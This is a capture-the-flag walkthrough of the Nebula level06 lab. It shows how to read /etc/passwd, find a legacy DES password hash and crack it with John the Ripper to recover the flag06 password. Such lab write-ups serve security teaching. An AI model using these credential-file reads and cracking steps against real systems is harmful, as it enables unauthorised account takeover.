"The legacy of unix system
Nebula 06 Agenda: “The flag06 account credentials came from a legacy unix system.”
If we’ll digging in flag06 home, we’ll find nothing interesting. However, if we try to grab users data from “/etc/passwd” (a text file that describes user login accounts for the system) it turns out that flag06 encrypted password is not stored in “/etc/shadow” (which instead of passwd is readable by superuser only):
1 level06@nebula:/home/flag06$ cat /etc/passwd | grep "flag06"
2 flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/shTo crack that password hash, let’s try to use old school pop-tool - “JTR”. But firstly need to install it as nebula account (pw the same).
1 level06@nebula:/home/flag06$ su nebula
2 Password:
3 nebula@nebula:/home/flag06$ sudo apt-get install john
4 [sudo] password for nebula:
5 Reading package lists... Done
6 .................................................
7 Setting up john (1.7.8-1) ...
8 nebula@nebula:/home/flag06$ exit
9 exit
10
11 level06@nebula:/home/flag06$ john /etc/passwd
12 Created directory: /home/level06/.john
13 Loaded 1 password hash (Traditional DES [128/128 BS SSE2])
14 hello (flag06)
15 guesses: 1 time: 0:00:00:00 100% (2) c/s: 25100 trying: 12345 - biteme
16 Use the "--show" option to display all of the cracked passwords reliablySuccess! At line 14 of the above codeblock, we can see that the flag06 account’s password is - “hello” phrase.
